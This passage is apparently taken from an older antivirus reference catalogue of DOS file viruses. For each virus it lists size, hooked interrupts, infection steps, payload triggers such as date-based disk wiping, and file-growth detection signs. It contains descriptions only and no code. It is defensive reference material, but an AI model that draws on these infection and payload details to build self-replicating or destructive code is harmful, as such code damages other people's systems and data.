  3473.     uninfected file that is executed. (b) It doesn't infect .COM files.
  3474.  
  3475. Damage:  None
  3476.  
  3477. Detection method: Infected .EXE files increase by 1125-1140 Bytes.
  3478.  
  3479. Note: The 5LO virus doesn't hook INT 24h when infecting files. An error
  3480. message appears if there is an I/O error (such as write protect).
  3481.  
  3482. [Aids 552]
  3483. Virus Name: AIDS552
  3484. Virus Type: Highest Memory Resident, File Virus (infects .EXE files)
  3485. Virus Length:  552 Bytes (EXE)
  3486. PC Vectors Hooked: INT 21h
  3487.  
  3488. Infection Procedure:
  3489. 1) The virus checks whether it is already loaded resident into memory.
  3490.     If "No", it then loads itself into memory  (highest memory) by
  3491.     hooking INT 21h.
  3492. 2) It then executes the original file.
  3493. 3) It infects when the command  "DEGUG FILE_NAME.EXE" is executed.
  3494.     b) Doesn't infect .COM files.
  3495.  
  3496. Damage:  None
  3497.  
  3498. Detection method: Infected .EXE files increase by 552 Bytes.
  3499.  
  3500. Note:
  3501. The  AIDS552 virus doesn't hook INT 24h when infecting files.  An
  3502. error message appears if there is an I/O error (such as write
  3503. protect).
  3504.  
  3505. [408]
  3506. Virus Name: 408
  3507. Virus Type: Memory Resident, File Virus (infects .COM files).
  3508. Virus Length:  408 Bytes (COM)
  3509. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3510.  
  3511. Infection Procedure:
  3512. 1) The virus checks whether it is already loaded resident in memory.
  3513.     If "No", it then loads itself resident into memory by hooking INT
  3514.     21h.
  3515. 2) It then executes the original file.
  3516. 3) With itself loaded resident into memory it will infect any
  3517.     uninfected file that is executed.  b) It doesn't infect .EXE files.
  3518.  
  3519. Detection method: Infected files increase by 408 Bytes.
  3520.  
  3521. Note:
  3522. The 408 virus doesn't hook INT 24h when infecting files. An error
  3523. message appears if there is an I/O error (such as write protect).
  3524.  
  3525. [BOOJUM]
  3526. Virus Name: BOOJUM
  3527. Virus Type:  Highest Memory Resident, File Virus (infects .EXE files)
  3528. Virus Length:  340 Bytes (EXE)
  3529. PC Vectors Hooked: INT 21h
  3530.  
  3531. Infection Procedure:
  3532. 1)  The virus checks whether it is already loaded resident in memory.
  3533.      If "No", it then loads itself into memory (highest memory) by
  3534.      hooking INT 21h.
  3535. 2) It then executes the original file.
  3536. 3) With itself loaded into memory it will infect any uninfected file
  3537.     that is executed. b) It doesn't infect .COM files.
  3538.  
  3539. Damage:  None
  3540.  
  3541. Detection method: Infected EXE files increase by 340 Bytes.
  3542.  
  3543. Note:
  3544. The BOOJUM virus doesn't hook INT 24h when infecting files. An
  3545. error message appears if there is an I/O error (such as write protect).
  3546.  
  3547. [Shirley]
  3548. Virus Name: SHIRLEY
  3549. Virus Type: Memory Resident, File Virus (infects .EXE files).
  3550. Virus Length:  4110 Bytes (EXE)
  3551. PC Vectors Hooked: INT 21h
  3552.  
  3553. Infection Procedure:
  3554. 1) The virus checks whether it is already loaded resident in memory.
  3555.     If "No", it then loads itself resident into memory (highest
  3556.     memory) by hooking INT 21h.
  3557. 2) It then executes the original file.
  3558. 3) With itself loaded resident into memory it will infect any
  3559.     uninfected file that is executed. b) It doesn't infect .COM files.
  3560.  
  3561. Damage:  None
  3562.  
  3563. Detection method: Infected EXE files increase by 4110 bytes.
  3564.  
  3565. Note:
  3566. The Shirley virus doesn't hook INT 24h when infecting files. An error
  3567. message appears if there is an I/O error (such as write protect).
  3568.  
  3569. [D-Tiny]
  3570. Virus Name: D-TINY
  3571. Virus Type: Memory Resident, File Virus (infects .COM files).
  3572. Virus Length:  126 Bytes (COM)
  3573. PC Vectors Hooked: INT 21h
  3574.  
  3575. Infection Procedure:
  3576. 1) The virus checks whether it is already loaded resident in memory.
  3577.     If "No", it then loads itself resident into memory by hooking INT
  3578.     21h.
  3579. 2) It then executes the original file.
  3580. 3) With itself loaded resident into memory it will infect any
  3581.     uninfected file that is executed. It doesn't infect .EXE files.
  3582.  
  3583. Damage:  None
  3584.  
  3585. Detection method: Infected COM files increase by 126 Bytes.
  3586.  
  3587. Note:
  3588. D-TINY doesn't hook INT 24h when infecting files. An error message
  3589. appears if there is an I/O error (such as write protect).
  3590.  
  3591.  
  3592. [01-07]
  3593. Virus Name: 01-07
  3594. Virus Type: Memory Resident, File Virus (infects .COM files)
  3595. Virus Length:  639 Bytes (COM)
  3596. PC Vectors Hooked: INT 21h
  3597.  
  3598. Infection Procedure:
  3599. 1) The virus checks whether the system date is between the 1st and
  3600.     the 6th of January.  If "Yes",  it shows the message:" Happy
  3601.     New Year " on the screen and the system halts.  If "No", the
  3602.     virus checks whether it is   already loaded resident in memory.
  3603.     If "No", it then loads itself resident into memory by hooking
  3604.     INT 21h.
  3605. 2) It then executes the original file.
  3606. 3) With itself loaded resident into memory it will infect any
  3607.     uninfected file that is executed. b) It doesn't infect .EXE files.
  3608.  
  3609. Damage: System halts when the system date is between the 1st and 6th
  3610. of January.
  3611.  
  3612. Detection method: Infected files increase by 639 Bytes.
  3613.  
  3614. Note:
  3615. The 01-07 virus doesn't hook INT 24h when infecting files.  An error
  3616. message appears if there is an I/O error (such as write protect).
  3617.  
  3618. [Bit_Addict]
  3619. Virus Name: BIT_ADDICT
  3620. Virus Type: Memory Resident, File Virus (infects .COM files)
  3621. Virus Length:  477 Bytes (COM)
  3622. PC Vectors Hooked: INT 21h
  3623.  
  3624. Infection Procedure:
  3625. 1)  The virus checks whether it is already loaded resident in memory.
  3626.      If "No", it then loads itself resident into memory by hooking INT
  3627.      21h.
  3628. 2) It then executes the original file.
  3629. 3) With itself loaded resident into memory it will infect any
  3630.     uninfected file that is executed.  b) It doesn't infect .EXE files.
  3631.  
  3632. Damage: When the virus has already infected 100 files, it will
  3633. destroy all data on the hard disk, then show the message: "BIT
  3634. ADDICTMZ> .... The Bit Addict says: You have a good tasting hard disk,
  3635. it was delicious !!!"
  3636.  
  3637. Detection method: Infected files increase by 477 Bytes.
  3638.  
  3639. Note:
  3640. The BIT_ADDICT virus doesn't hook INT 24h when infecting files.
  3641. An error message appears if there is an I/O error (such as write
  3642. protect).
  3643.  
  3644. [CSL-2]
  3645. Virus Name: CSL-2
  3646. Virus Type: Highest Memory Resident, File Virus (infects .COM files)
  3647. Virus Length:  709 Bytes (COM)
  3648. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3649.  
  3650. Infection Procedure:
  3651. 1)  The virus checks whether it is already loaded resident in memory.
  3652.      If "No", it then loads itself resident into memory by hooking INT
  3653.      21h.
  3654. 2) It then executes the original file.
  3655. 3) With itself loaded resident into memory it will infect any
  3656.     uninfected file that is executed. b) It doesn't infect .EXE files.
  3657.  
  3658. Damage:   None
  3659.  
  3660. Detection method: Infected files increase by 709 Bytes.
  3661.  
  3662. Note:
  3663. The CSL-2 virus doesn't hook INT 24h when infecting files. An error
  3664. message appears if there is an I/O error (such as write protect).
  3665.  
  3666. [Highland]
  3667. Virus Name: HIGHLAND
  3668. Virus Type:  Memory Resident, File Virus (infects .COM files)
  3669. Virus Length:  477 Bytes (COM)
  3670. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3671.  
  3672. Infection Procedure:
  3673. 1)  The virus checks whether it is already loaded resident in memory.
  3674.      If "No", it then loads itself resident into memory by hooking INT
  3675.      21h.
  3676. 2) It then executes the original file.
  3677. 3) With itself loaded resident into memory it will infect any
  3678.     uninfected file that is executed.  b) It doesn't infect .EXE files.
  3679.  
  3680. Damage: When the system date is the 29th, all files infected by
  3681. Highland can't be executed.
  3682.  
  3683. Detection method: Infected files increase by 477 Bytes.
  3684.  
  3685. Note: Highland doesn't hook INT 24h when infecting files.  An error
  3686. message appears if there is an I/O error (such as write protect).
  3687.  
  3688. [CMDR]
  3689. Virus Name: CMDR
  3690. Virus Type:  Memory Resident, File Virus (infects .COM files)
  3691. Virus Length:  4096 Bytes (COM)
  3692. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3693.  
  3694. Infection Procedure:
  3695. 1) The virus checks whether it is already loaded resident in memory.
  3696.     If "No", it then loads itself resident into memory by hooking INT
  3697.     21h.
  3698. 2) It then executes the original file.
  3699. 3) With itself loaded resident into memory it will infect any
  3700.     uninfected file that is executed. b) It doesn't infect .EXE files.
  3701.  
  3702. Damage:   None
  3703.  
  3704. Detection method: Infected files increase by 4096 Bytes.
  3705.  
  3706. Note:
  3707. The CMDR virus doesn't hook INT 24h when infecting files. An error
  3708. message appears if there is an I/O error (such as write protect).
  3709.  
  3710. [POX]
  3711. Virus Name: POX
  3712. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  3713. Virus Length:  609 Bytes (COM)
  3714. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 9h
  3715.  
  3716. Infection Procedure:
  3717. 1) The virus checks whether it is already loaded resident in memory.
  3718.     If "No", it then loads itself resident into memory (highest memory)
  3719.     by hooking INT  21h.
  3720. 2) It then executes the original file.
  3721. 3) With itself loaded resident into memory it will infect any
  3722.     uninfected file that is executed. b) It doesn't infect .EXE files.
  3723.  
  3724. Damage: POX hooks INT 9h, when the <Delete> key is pressed. The virus
  3725. will check the system date; if DAY=24, it will format the hard disk.
  3726.  
  3727. Detection method: Infected files increase by 609 Bytes.
  3728.  
  3729. Note:
  3730. The POX virus doesn't hook INT 24h when infecting files.  An error
  3731. message appears if there is an I/O error (such as write protect).
  3732.  
  3733. [SBC-1]
  3734. Virus Name: SBC-1
  3735. Virus Type: Highest Memory Resident, File Virus (infects .COM files)
  3736. Virus Length:  No change
  3737. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3738.  
  3739. Infection Procedure:
  3740. 1) The virus checks whether it is already loaded resident in memory.
  3741.     If "No", it then loads itself resident into memory (highest
  3742.     memory) by hooking INT 21h.
  3743. 2) It then checks whether the "COMMAND.COM" file has been infected;
  3744.     if "No", then it infects the file.
  3745. 3) It then executes the original file.
  3746. 4) With itself loaded resident into memory it will infect any
  3747.     uninfected file that is executed.  b) It doesn't infect .EXE files.
  3748.  
  3749. Damage: Overwrites the original file, so the length of infected files
  3750. won't increase.
  3751.  
  3752. Detection method:  None
  3753.  
  3754. Note: The SBC-1 doesn't hook INT 24h when infecting files.  An error
  3755. message appears if there is an I/O error (such as write protect).
  3756.  
  3757. [Nov_17-1]
  3758. Virus Name: NOV_17-1
  3759. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3760. Virus Length:  768 Bytes (COM and EXE)
  3761. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3762.  
  3763. Infection Procedure:
  3764. 1) This virus checks whether it is already loaded resident in memory.
  3765.     If "No", it then loads itself resident into memory by hooking INT
  3766.     21h.
  3767. 2) It then executes the original file.
  3768. 3) With itself loaded resident into memory it will infect any
  3769.     uninfected file that is executed.
  3770.  
  3771. Damage:   None
  3772.  
  3773. Detection method: Infected files increase by 768 Bytes.
  3774.  
  3775. Note: The NOV_17-1 virus doesn't hook INT 24h when infecting files.
  3776. An error message appears if there is an I/O error (such as write
  3777. protect).
  3778.  
  3779. [HBT]
  3780. Virus Name: HBT
  3781. Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
  3782. Virus Length:  394 Bytes (COM and EXE)
  3783. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
  3784.  
  3785. Infection Procedure:
  3786. 1) The virus checks whether it is already loaded resident in memory.
  3787.     If "No", it then loads itself resident into memory by hooking INT
  3788.     21h.
  3789. 2) It then executes the original file.
  3790. 3) With itself loaded resident into memory it will infect any
  3791.     uninfected file that is executed.
  3792.  
  3793. Damage: When the virus is resident in memory, a file can't be
  3794. executed, but only infected.
  3795.  
  3796. Detection method: Infected files increase by 394 Bytes.
  3797.  
  3798. Note:
  3799. The  HBT virus doesn't hook INT 24h when infecting files.  An error
  3800. message appears if there is an I/O error (such as write protect).
  3801.  
  3802. [Gotcha]
  3803. Virus Name: GOTCHA
  3804. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3805. Virus Length:  906 Bytes (COM and EXE)
  3806. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3807.  
  3808. Infection Procedure:
  3809. 1) The virus checks whether it is already loaded resident in memory.
  3810.     If "No", it then loads itself resident into memory (highest
  3811.     memory) by hooking INT 21h.
  3812. 2) It then executes the original file.
  3813. 3) With itself loaded resident into memory it will infect any
  3814.     uninfected file that is executed.
  3815. 4) It also infects when a file is renamed, file attributes are set,
  3816.     search for a matching file or deleting a file.
  3817.  
  3818. Damage:   None
  3819.  
  3820. Detection method: Infected files increase by 906 Bytes.
  3821.  
  3822. Note: The Gotcha virus hooks INT 24h when infecting files. Omits I/O
  3823. error (such as write protect).
  3824.  
  3825. [Voronezh-2]
  3826. Virus Name: VORONEZH-2
  3827. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3828. Virus Length:  1600 Bytes (COM and EXE)
  3829. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3830.  
  3831. Infection Procedure:
  3832. 1) The virus checks whether it is already loaded resident in memory.
  3833.     If "No", it then loads itself resident into memory by hooking
  3834.     INT 21h.
  3835. 2) It then executes the original file.
  3836. 3) With itself loaded resident into memory it will infect any
  3837.     uninfected file that is executed.
  3838.  
  3839. Damage:   None
  3840.  
  3841. Detection method: Infected files increase by 1600 Bytes.
  3842.  
  3843. Note:
  3844. The Voronezh-2 virus  hooks INT 24h when infecting files. It omits
  3845. I/O errors (such as write protect).
  3846.  
  3847. [Amilia]
  3848. Virus Name: AMILIA
  3849. Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
  3850. Virus Length:  1614 Bytes (COM and EXE)
  3851. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3852.  
  3853. Infection Procedure:
  3854. 1) The virus checks whether it is already loaded resident in memory.
  3855.     If "No", it then loads itself resident into memory by hooking
  3856.     INT 21h.
  3857. 2) It then executes the original file.
  3858. 3) With itself loaded resident into memory it will infect any
  3859.     uninfected file that is executed.
  3860.  
  3861. Damage:
  3862. 1) If it is Sunday, a message is displayed on the screen: "Amilia I
  3863.     virii - [NUKE]  1991 By Rock Steady/NUKE," then the system halts.
  3864. 2) If it is between 4 and 5 o'clock in the afternoon, a smiling face
  3865.     appears on the screen.
  3866.  
  3867. Detection method:
  3868. 1) Infected files increase by 1614 Bytes.
  3869. 2) A smiling face appears on the screen.
  3870.  
  3871. Note:
  3872. The Amilia virus hooks INT 24h when infecting files. It omits I/O
  3873. errors (such as write protect).
  3874.  
  3875. [981]
  3876. Virus Name: 981
  3877. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3878. Virus Length: 981 Bytes (COM), about 1010 Bytes (EXE)
  3879. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3880.  
  3881. Infection Procedure:
  3882. 1) The virus checks the DOS version; if the DOS version is earlier than
  3883.     3.0 it will show the message: " This program requires MS-DOS 3.0 or
  3884.     later."
  3885. 2) The virus checks whether it is already loaded resident in memory.
  3886.     If "No", it then loads itself resident into memory (highest memory)
  3887.     by hooking INT 21h.
  3888. 2) It then executes the original file.
  3889. 3) With itself loaded resident into  memory it will infect any
  3890.     uninfected file that is executed.
  3891.  
  3892. Damage:   None
  3893.  
  3894. Detection method: Infected .COM files increase by 981 Bytes, .EXE
  3895. files increase by 1010 Bytes.
  3896.  
  3897. Note: The 981 virus hooks INT 24h when infecting files. It omits I/O
  3898. errors (such as write protect).
  3899.  
  3900. [Gotcha-2]
  3901. Virus Name: GOTCHA-2
  3902. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3903. Virus Length:  627 Bytes (COM), 527 Bytes (EXE)
  3904. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3905.  
  3906. Infection Procedure:
  3907. 1) The virus checks whether it is already loaded resident in memory.
  3908.     If "No", it then loads itself resident into memory by hooking INT
  3909.     21h.
  3910. 2) It then executes the original file.
  3911. 3) With itself loaded resident into memory it will infect any
  3912.     uninfected file that is executed. a) Before it infects a file,
  3913.     it will check the file name.
  3914.  
  3915. Damage:   None
  3916.  
  3917. Detection method: Infected .COM files increase by 627 Bytes and .EXE
  3918. files increase by 527  Bytes.
  3919.  
  3920. Note:
  3921. The Gotcha-2 virus hooks INT 24h and closes the "control_break"
  3922. function when infecting files. It omits I/O errors (such as write
  3923. protect).
  3924.  
  3925. [Hungarian]
  3926. Virus Name: HUNGARIAN
  3927. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  3928. Virus Length:  749 Bytes (COM and EXE)
  3929. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  3930.                           INT 8h
  3931.  
  3932. Infection Procedure:
  3933. 1)  The virus checks whether it is already loaded resident in memory.
  3934.      If "No", it then loads itself resident into memory (highest
  3935.      memory) by hooking INT 21h.
  3936. 2) If (Year=1990 and month >=6) then it will hook INT 8h.
  3937. 3) It then executes the original file.
  3938. 4) With itself loaded resident into memory it will infect any
  3939.     uninfected file that is executed.
  3940.  
  3941. Damage: When Hungarian hooks INT 8h, it will set the Counter to 0xFFFF.
  3942. Each time when INT 8h  is called, the counter  will decrease by one.
  3943. When the  counter equals zero (about one hour), it will begin to
  3944. destroy files. Whenever you run any file, it will be destroyed.
  3945.  
  3946. Detection method:  Infected files increase by 749 Bytes.
  3947.  
  3948. Note:  The Hungarian virus hooks INT 24h when infecting  files.
  3949. It omits I/O errors (such as write protect).
  3950.  
  3951. [CK]
  3952. Virus Name: CK
  3953. Virus Type:  Memory Resident, File Virus (infects .COM  and .EXE files)
  3954. Virus Length:  1163 Bytes (COM and EXE)
  3955. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  3956.                           INT 13h
  3957.  
  3958. Infection Procedure:
  3959. 1) The virus checks whether it is already loaded resident in memory.
  3960.     If "No", it then loads itself resident into memory by hooking
  3961.     INT 21h.
  3962. 2) It then executes the original file.
  3963. 3) With itself loaded resident into memory it will infect any
  3964.     uninfected file that is executed.
  3965.  
  3966. Damage: The virus hooks INT 13h; some time later, the system will
  3967. produce sounds.
  3968.  
  3969. Detection method: Infected files increase by 1163 Bytes.
  3970.  
  3971. Note:  The CK virus hooks INT 24h when infecting files. It omits
  3972. I/O errors (such as write protect).
  3973.  
  3974. [2136]
  3975. Virus Name: 2136
  3976. Virus Type:  Highest Memory Resident, File Virus (.COM and .EXE files)
  3977. Virus Length:  2136 Bytes (COM and EXE)
  3978. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  3979.  
  3980. Infection Procedure:
  3981. 1) The virus checks whether it is already loaded resident in memory.
  3982.     If "No", it then loads itself resident into memory by hooking INT
  3983.     21h.
  3984. 2) It then executes the original file.
  3985. 3) With itself loaded resident into memory it will infect any
  3986.     uninfected file that is executed.
  3987.  
  3988. Damage: None
  3989.  
  3990. Detection method: Infected files increase by 2136 Bytes.
  3991.  
  3992. Note: The 2136 virus hooks INT 24h when infecting files. It omits
  3993. I/O errors (such as write protect).
  3994.  
  3995. [Casteggi]
  3996. Virus Name: CASTEGGI
  3997. Virus Type:  Highest Memory Resident, File Virus (.COM and .EXE files)
  3998. Virus Length:  2881 Bytes (COM and EXE)
  3999. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  4000.                           INT 1Ch
  4001.  
  4002. Infection Procedure:
  4003. 1) The virus checks whether it is already loaded resident in memory.
  4004.     If "No", it then loads itself resident into memory by hooking INT
  4005.     21h.
  4006. 2) It then executes the original file.
  4007. 3) With itself loaded resident into memory it will infect any
  4008.     uninfected file that is executed.
  4009.  
  4010. Damage: When DAY>10, the virus will count time by hooking INT 1Ch.
  4011. About 6 minutes later, the screen image will be destroyed.
  4012.  
  4013. Detection method: Infected files increase by 2881 Bytes.
  4014.  
  4015. Note: The Casteggi virus hooks INT 24h when infecting files. It
  4016. omits I/O errors (such as write protect).
  4017.  
  4018. [Enola]
  4019. Virus Name: ENOLA
  4020. Virus Type:  Memory Resident, File Virus (infects .COM and .EXE files)
  4021. Virus Length:  1865--1875 Bytes (COM and EXE)
  4022. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  4023.                           INT 8h
  4024.  
  4025. Infection Procedure:
  4026. 1) The virus checks whether it is already loaded resident in memory.
  4027.     If "No", it then loads itself resident into memory by hooking INT
  4028.     21h.
  4029. 2) It then executes the original file.
  4030. 3) With itself loaded resident into memory it will infect any
  4031.     uninfected file that is executed.
  4032.  
  4033. Damage: When the virus has stayed resident for 140 minutes and INT
  4034. 21h has been called for more than 72 times, all data on the hard
  4035. disk will be destroyed.
  4036.  
  4037. Detection method: Infected files increase by 1865-1875 Bytes.
  4038.  
  4039. Note: The Enola virus hooks INT 24h when infecting files. It omits
  4040. I/O errors (such as write protect).
  4041.  
  4042. [Ontari03]
  4043. Virus Name: ONTARI03
  4044. Virus Type:  Highest Memory Resident, File Virus (.COM and .EXE files)
  4045. Virus Length:  2048 Bytes (COM and EXE)
  4046. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4047.  
  4048. Infection Procedure:
  4049. 1) The virus checks whether it is already loaded resident in memory.
  4050.     If "No", it then loads itself resident into memory by hooking
  4051.     INT 21h.
  4052. 2) It then executes the original file.
  4053. 3) With itself loaded in memory it will infect any uninfected file
  4054.     that is executed.
  4055.  
  4056. Damage: None
  4057.  
  4058. Detection method: Infected files increase by 2048 Bytes.
  4059.  
  4060. Note: The Ontari03 virus hooks INT 24h when infecting files. It omits
  4061. I/O errors (such as write protect).
  4062.  
  4063. [PCBB-B]
  4064. Virus Name: PCBB-B
  4065. Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
  4066. Virus Length:  3072 Bytes (COM and EXE)
  4067. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4068.  
  4069. Infection Procedure:
  4070. 1) The virus checks whether it is already loaded resident in memory.
  4071.     If "No", it then loads itself resident into memory (highest
  4072.     memory) by hooking INT 21h.
  4073. 2) It then executes the original file.
  4074. 3) With itself loaded resident into memory it will infect any
  4075.     uninfected file that is executed.
  4076.  
  4077. Damage: None
  4078.  
  4079. Detection method: Infected files increase by 3072 Bytes.
  4080.  
  4081. Note: The PCBB virus hooks INT 24h when infecting files. It omits
  4082. I/O errors (such as write protect).
  4083.  
  4084. [Canna615]
  4085. Virus Name: CANNA615
  4086. Virus Type:  Highest Memory Resident, File Virus (.COM and .EXE files)
  4087. Virus Length:  1568 Bytes (COM and EXE)
  4088. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4089.  
  4090. Infection Procedure:
  4091. 1) The virus checks whether it is already loaded resident in memory.
  4092.     If "No", it then loads itself resident into memory by hooking INT
  4093.     21h.
  4094. 2) It then checks whether the system date is Friday, and Seconds is
  4095.     zero; if "Yes", then a message and a picture appear on the
  4096.     screen: "LEGALIZE CANNA615" and a picture of a hemp leaf.
  4097. 3) It then executes the original file.
  4098. 4) With itself loaded resident into memory it will infect any
  4099.     uninfected file that is executed.
  4100.  
  4101. Damage:   None
  4102.  
  4103. Detection method:  Infected files increase by 1568 Bytes.
  4104.  
  4105. Note: The Canna615 virus hooks INT 24h when infecting files. It
  4106. omits I/O error (such as write protect).
  4107.  
  4108. [Magnum]
  4109. Virus Name: MAGNUM
  4110. Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
  4111. Virus Length:  2560 Bytes (COM and EXE)
  4112. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  4113.                           INT 8h
  4114.  
  4115. Infection Procedure:
  4116. 1) The virus checks whether it is already loaded resident in memory.
  4117.     If "No", it then loads itself resident into memory by hooking INT
  4118.     21h.
  4119. 2) It then executes the original file.
  4120. 3) With itself loaded resident into memory it will infect any
  4121.     uninfected file that is executed.
  4122.  
  4123. Damage:   None
  4124.  
  4125. Detection method: Infected files increase by 2560 Bytes.
  4126.  
  4127. Note:
  4128. 1) The Magnum virus hooks INT 24h when infecting files. It omits
  4129.     I/O errors (such as write protect).
  4130. 2) The virus only runs under DOS 3.3.
  4131.  
  4132. [Lycee]
  4133. Virus Name: LYCEE
  4134. Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
  4135. Virus Length:  1788 Bytes (COM and EXE)
  4136. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  4137.                           INT 8h, INT 9h
  4138.  
  4139. Execution Procedure:
  4140. 1) Checks whether it resides in memory.  If not, hooks INT 21h, INT 8h
  4141.     and INT 9h, installs itself as memory resident, and then executes
  4142.     the host program.
  4143. 2) If the virus already resides in memory, it will proceed to execute
  4144.     the host program directly.
  4145.  
  4146. Infection Procedure:
  4147. 1) The virus Infects files by AH=4B in INT 21h. When an uninfected
  4148.     program is executed, it will get infected.
  4149. 2) Lycee will hook INT 24h before infecting files to ignore I/O errors.
  4150.  
  4151. Damage: If you haven't pressed any keys for a while (i.e., few minutes),
  4152. a small window will appear on the screen until you press a key.
  4153.  
  4154. Detection method: Infected files increase by 1788 Bytes.
  4155.  
  4156. Note: The Lycee virus hooks INT 24h when infecting files. It omits
  4157. I/O errors (such as write protect).
  4158.  
  4159. Remarks: The virus does timing by INT 8h.  When the keyboard is not
  4160. hit for a certain period of time, the virus will open a small window
  4161. on the screen until a key is pressed.
  4162.  
  4163. [Brain2]
  4164. Virus Name: BRAIN2
  4165. Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
  4166. Virus Length:  1935 Bytes (COM and EXE)
  4167. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  4168.                           INT 1Ch
  4169.  
  4170. Infection Procedure:
  4171. 1) It checks whether the system date is the 17th of November or the
  4172.     6th of February; if "Yes", it will display some messages and play
  4173.     music.
  4174. 2) The virus then checks whether it  is already loaded resident in
  4175.     memory. If "No", it then loads itself resident into memory by
  4176.     hooking INT 21h.
  4177. 3) It then executes the original file.
  4178. 4) It then checks whether the system date is the 1st of  February,
  4179.     July, September or December; if "yes", the virus will show a
  4180.     flash square by hooking INT 1Ch.
  4181. 5) With itself loaded resident into memory it will infect any
  4182.     uninfected file that is executed.
  4183.  
  4184. Damage: None
  4185.  
  4186. Detection method: Infected files increase by 1935 Bytes.
  4187.  
  4188. Note: The Brain2 virus hooks INT 24h when infecting files. It omits
  4189. I/O errors (such as write protect).
  4190.  
  4191. [Antiprnt]
  4192. Virus Name: ANTIPRNT
  4193. Virus Type:  Highest Memory Resident, File Virus (infects .EXE files)
  4194. Virus Length:  593 Bytes (EXE)
  4195. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4196.  
  4197. Infection Procedure:
  4198. 1) The virus checks whether it is already loaded resident in memory.
  4199.     If "No", it then loads itself resident into memory (highest
  4200.     memory) by hooking INT 21h.
  4201. 2) It then executes the original  file.
  4202. 3) With itself loaded resident into memory it will infect any
  4203.     uninfected file that is executed.
  4204.  
  4205. Damage: If the DOS Version is later than 3.0, and "PRINTER" is
  4206. installed, then the virus will destroy data on the current disk.
  4207.  
  4208. Detection method: Infected files increase by 593 Bytes.
  4209.  
  4210. Note: The ANTIPRNT virus hooks INT 24h when infecting files. It omits
  4211. I/O errors (such as write protect).
  4212.  
  4213. [ABC]
  4214. Virus Name: ABC
  4215. Virus Type:  Highest Memory Resident, File Virus (infects .EXE files)
  4216. Virus Length:  2912 Bytes (EXE)
  4217. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
  4218.                           INT 1Ch, INT 16h
  4219.  
  4220. Infection Procedure:
  4221. 1) The virus checks whether it is already loaded resident in memory.
  4222.     If "No", it then loads itself resident in memory (highest memory)
  4223.     by hooking INT 21h, INT 1Ch, INT 16h.
  4224. 2) It then executes the original file.
  4225. 3) With itself loaded resident into memory it will infect any
  4226.     uninfected file that is executed. b) Doesn't infect COM files
  4227.     and EXE files smaller than 20KB.
  4228.  
  4229. Damage: When the system date is the 14th, and the virus has been in
  4230. the memory for 55 minutes, the virus will destroy data on the hard
  4231. disk.
  4232.  
  4233. Detection method: Infected files increase by 2912 Bytes.
  4234.  
  4235. Note: The ABC virus hooks INT 24h when infecting files. It omits
  4236. I/O errors (such as write protect).
  4237.  
  4238. [CivilWar]
  4239. Virus Name: Civilwar
  4240. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  4241. Virus Length:  599 Bytes (COM)
  4242. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4243.  
  4244. Execution Procedure:
  4245. 1) The virus checks whether it is already loaded resident in memory.
  4246.     If "No", it then loads itself resident into memory (highest memory)
  4247.     by hooking INT 21h.
  4248. 2) It then executes the original file.
  4249. 3) With itself loaded resident into memory it will infect any
  4250.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4251.  
  4252. Damage: None
  4253.  
  4254. Detection method: Infected files increase by 599 Bytes.
  4255.  
  4256. Note: The Civilwar virus  hooks INT 24h when infecting files. It
  4257. omits I/O errors (such as write protect).
  4258.  
  4259. [Leech]
  4260. Virus Name: Leech
  4261. Virus Type:  Highest Memory Resident, File Virus (infects .COM files)
  4262. Virus Length:  1024 Bytes (COM)
  4263. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
  4264.  
  4265. Execution Procedure:
  4266. 1) The virus checks whether it is already loaded resident in memory.
  4267.     If "No", it then loads itself resident into memory by hooking INT
  4268.     21h.
  4269. 2) It then executes the original file.
  4270. 3) With itself loaded resident into memory it will infect any
  4271.     uninfected file that is executed. b) It doesn't infect .EXE files.
  4272.  
  4273. Damage: None
  4274.  
  4275. Detection method: Infected files increase by 1024 Bytes.
  4276.  
  4277. Note: The Leech virus hooks INT 24h when infecting files. It omits
  4278. I/O errors (such as write protect).
  4279.  
  4280. [302]
